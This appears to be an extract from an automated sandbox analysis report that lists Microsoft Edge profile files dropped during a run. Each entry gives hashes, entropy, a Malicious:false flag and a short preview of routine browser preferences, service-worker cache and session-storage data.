                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3e6e6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13719
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.234589049081205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNP9ktuYUimDY8EbV+FOdQwaxNPZYJ:stxPGKSu4wsOztJArbGgQwz
                                                                                                                                                                                                                                                                                                MD5:22729E27937C44A3F143830FBCF1ECA2
                                                                                                                                                                                                                                                                                                SHA1:E2662240F980FD708F25413D97533881446A4ED0
                                                                                                                                                                                                                                                                                                SHA-256:CCC1D4F53F0F9C2044465ADA6907862100C4C879571B3A070133777920256890
                                                                                                                                                                                                                                                                                                SHA-512:E70CE793EBA7597830C3A2073B3D5D69EC57EBD52B3317186D152E13A5E9A6A0782876094A51CD6A229524B688BF9C6B278C30B876264334EA6E6BAE15E14EA3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):37149
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.564316420305124
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:lxqOypWPKsfG78F1+UoAYDCx9Tuqh0VfUC9xbog/OVmwIPAd/rwqWfQqKputur:lxqOypWPKsfG7u1jaDwIIdMqWfJXtg
                                                                                                                                                                                                                                                                                                MD5:6D0BE52BC6B600F6DDE27421D7177034
                                                                                                                                                                                                                                                                                                SHA1:8B06AD28115183F7CA30EB7BB7A56E54A4D2A0AC
                                                                                                                                                                                                                                                                                                SHA-256:220494D2EE786880E010A622C59362F5EA917467CF90539D6EF9FAF669C4EC95
                                                                                                                                                                                                                                                                                                SHA-512:B72C0DE1A4EDE9DE731FF83A8899148E0BA953D91D6A05C6E2F71469B11CE1D2E755D9B0BEFA10B521D7C03B84A7D8D4DB1279677264BC47AA35CE76C1142947
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380725942936385","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380725942936385","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF32ba5.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):37149
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.564316420305124
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:lxqOypWPKsfG78F1+UoAYDCx9Tuqh0VfUC9xbog/OVmwIPAd/rwqWfQqKputur:lxqOypWPKsfG7u1jaDwIIdMqWfJXtg
                                                                                                                                                                                                                                                                                                MD5:6D0BE52BC6B600F6DDE27421D7177034
                                                                                                                                                                                                                                                                                                SHA1:8B06AD28115183F7CA30EB7BB7A56E54A4D2A0AC
                                                                                                                                                                                                                                                                                                SHA-256:220494D2EE786880E010A622C59362F5EA917467CF90539D6EF9FAF669C4EC95
                                                                                                                                                                                                                                                                                                SHA-512:B72C0DE1A4EDE9DE731FF83A8899148E0BA953D91D6A05C6E2F71469B11CE1D2E755D9B0BEFA10B521D7C03B84A7D8D4DB1279677264BC47AA35CE76C1142947
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380725942936385","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380725942936385","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2394
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.806298525485997
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:F2xc5NmywcncmoDCRORpllg2hE4fRHeldCRORpllg2hR7ygFCRORpllg2hEjRHe3:F2emyBMrd64fB+rdn26rd6jBsrdlBF
                                                                                                                                                                                                                                                                                                MD5:E24A3A67519AC09E8453491801539E99
                                                                                                                                                                                                                                                                                                SHA1:C932BC1ED4BC50CFD57BDA5435940307C23E0209
                                                                                                                                                                                                                                                                                                SHA-256:06A175C813622C5AB9DC9EDE774C28ACB94D34EF1B90C17A2172E930B97462F2
                                                                                                                                                                                                                                                                                                SHA-512:5B46B2A2623B262871D4825A379ACEB05B891E139306C0853494D4F4B9AFC1941FE8398185F6078188ED420F335DFBD7F3A02BFD3D50007DDAA6AECE9F0D4C69
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..]4.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):303
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.138532026033502
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp41Wq1cNwi23oH+TcwtE/a252KLl74ri+q2PcNwi23oH+TcwtE/a2ZIFUv:7p4ccZYeb8xLl4u+vLZYeb8J2FUv
                                                                                                                                                                                                                                                                                                MD5:CA51001DFE381AE840964F13C5DB2567
                                                                                                                                                                                                                                                                                                SHA1:3F3ACE7F8264771D4380C6590422A037BB7BC95E
                                                                                                                                                                                                                                                                                                SHA-256:59490CD4A635393DF468EDEFD1B5B27FE60E7738D6B90AE2E3F853DAD5CA41BA
                                                                                                                                                                                                                                                                                                SHA-512:0F6BD6627BD9934F4095992D384B0683E5200A43677704F28E241331B86AA29C4787A8DB75E1D04FB9A92EB17AE8FF74492670D8C821E000C50D4AED8189174C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:13.102 13c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/07-07:19:13.118 13c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):115273
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.5774803702102105
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtrbXMTQ1Z3f:B9LyxPXfOxr1lMe1nL/5L/TXJ6zQ0r
                                                                                                                                                                                                                                                                                                MD5:A24670D6A3F6FD1E78B52972CE115A31
                                                                                                                                                                                                                                                                                                SHA1:824C860B6150B32E7CA4D8F38A0BEDB8EE8BB562
                                                                                                                                                                                                                                                                                                SHA-256:983270E1D2987F30881CBEDA9EE0D05EB2AB411815351588C1D65E57EAB0404E
                                                                                                                                                                                                                                                                                                SHA-512:92506EFBB100DE28A8A4BD4E2CD79F2AFCE6AFE32D3BDF0B40F2EBC68082C1F0FF21BCE04676DAF64AE1CA11815ADB769C2CB484FF32EE068B945E6A4BDFE988
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):189857
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.387997043638419
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:+GxdyGTYUWWewXdX9vdxL/kOB9xTh0jaauwPCQ3Zr:fewt9vnL/DBX6jaeZd
                                                                                                                                                                                                                                                                                                MD5:60D134EFF51AAE98194854E2A9919036
                                                                                                                                                                                                                                                                                                SHA1:375E457084EFFAF1BAEF76AE100C0D85CD3AAFFB
                                                                                                                                                                                                                                                                                                SHA-256:DC840BC45AE492AEE3380783C9E542C70A7629CE7585C88056E14FB2BB118FE5
                                                                                                                                                                                                                                                                                                SHA-512:9F49A4F5924D74217FB415FF9A6719865D9C7DC9686F99723A323035B685E11DFF398E42CE9F7504ECAE8B63F8078F2F667EDAF2F2FCBCB35C93B71B3D73CEE8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0....z3.................;\....x.H........,T.8..`,.....L`.....,T...`......L`......Rc2.<.....exports...Rc.Z......module....RcRo.&....define....Rb.A......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....L1{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....`...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5654124237607285
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:aQZK0jXl/l7n/lxEstllTqUx:ayK0zEsMA
                                                                                                                                                                                                                                                                                                MD5:006770934F704682C2E937C60C408C98
                                                                                                                                                                                                                                                                                                SHA1:950806954507FAE3DDD4595EB6DD04E937D4C68E
                                                                                                                                                                                                                                                                                                SHA-256:B19DD0261696B3FE982C560F940089206558B82DC39FF2606679F1C95D13E635
                                                                                                                                                                                                                                                                                                SHA-512:6A33150EE102B9656DB14EA03E8366F0680C7240131CE142211017A800238A1743E152175C166B2B0D42754130920664D22C9C2820015A628628FE95667D94DF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@....u[.oy retne.........................X....,..................W.../.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5654124237607285
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:aQZK0jXl/l7n/lxEstllTqUx:ayK0zEsMA
                                                                                                                                                                                                                                                                                                MD5:006770934F704682C2E937C60C408C98
                                                                                                                                                                                                                                                                                                SHA1:950806954507FAE3DDD4595EB6DD04E937D4C68E
                                                                                                                                                                                                                                                                                                SHA-256:B19DD0261696B3FE982C560F940089206558B82DC39FF2606679F1C95D13E635
                                                                                                                                                                                                                                                                                                SHA-512:6A33150EE102B9656DB14EA03E8366F0680C7240131CE142211017A800238A1743E152175C166B2B0D42754130920664D22C9C2820015A628628FE95667D94DF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@....u[.oy retne.........................X....,..................W.../.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF35005.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.5654124237607285
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:aQZK0jXl/l7n/lxEstllTqUx:ayK0zEsMA
                                                                                                                                                                                                                                                                                                MD5:006770934F704682C2E937C60C408C98
                                                                                                                                                                                                                                                                                                SHA1:950806954507FAE3DDD4595EB6DD04E937D4C68E
                                                                                                                                                                                                                                                                                                SHA-256:B19DD0261696B3FE982C560F940089206558B82DC39FF2606679F1C95D13E635
                                                                                                                                                                                                                                                                                                SHA-512:6A33150EE102B9656DB14EA03E8366F0680C7240131CE142211017A800238A1743E152175C166B2B0D42754130920664D22C9C2820015A628628FE95667D94DF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@....u[.oy retne.........................X....,..................W.../.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5593
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4095505318539927
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:K9ysr6n78mYzKXepmVbDa+VXt29Xp+m+VU6w6Ll9iSrk1+QrvH2UxEvN:Nsr6n78mYzKXe0VbDa+Vd29Xp+mKU6nk
                                                                                                                                                                                                                                                                                                MD5:61E762326846A5E437F124C6A252D2EF
                                                                                                                                                                                                                                                                                                SHA1:11BD6A87F1E002DE93D6D5F30C0C0C65A8AE8759
                                                                                                                                                                                                                                                                                                SHA-256:303F1DE150F30A86FF42B45A5938C4B6B7DEFA90ED4F4068BAD58685783D8C43
                                                                                                                                                                                                                                                                                                SHA-512:B701D79DD824C7C50036D711F5F8E48B897867BD1259FC6B13CE0AF5EB844407C7BD71A24F35ABA72BA84E900B7991287BE3168CC3A0041923DCA1CE10288843
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................i9b................next-map-id.1.Cnamespace-56698a45_aecf_4427_b4f7_6702d21d0905-https://ntp.msn.com/.0]T.0.................map-0-shd_sweeper.({.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.1.s.-.p.n.p.f.e.d.l.o.c.,.p.n.p.w.x.e.x.p.i.r.e.6.0.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.w.-.s.a.n.o.r.e.v.c.c.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.c.,.p.r.g.-.1.s.w.-.l.d.n.y.c.t.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.t.r.a.f.f.i.c.-.t.r.a.n.-.n.y.-.t.,.p.r.g.-.p.2.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.p.2.-.t.r.a.n.-.t.r.d.,.p.r.g.-.p.r.2.-.m.a.r.k.e.t.s.e.l.-.t.,.1.s.-.p.2.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):327
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.103978624941258
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp49UN4q2PcNwi23oH+TcwtrQMxIFUtL4/c3JZmwl41czkwOcNwi23oH+Tcwtrb:7p49G4vLZYebCFUtL4+J/l41cz54ZYeL
                                                                                                                                                                                                                                                                                                MD5:81FD4B5385C5783F1BE2396A43CDF4D2
                                                                                                                                                                                                                                                                                                SHA1:9A4CE016F09699A393ACF8EF3ECFAEEC8590E293
                                                                                                                                                                                                                                                                                                SHA-256:F6039D6EC416DA600875A8DC988BCE08922151F845856AE3033C9FA48D587859
                                                                                                                                                                                                                                                                                                SHA-512:220888D6A30ABB92E5801E15989467F44F4C2F35920DE04AF23B60FCBAD6288265B5925345C7B9432E68590ACDCCA414E9758D436CC454E43C095831D0169825
                                                                                                                                                                                                                                                                                                Malicious:false
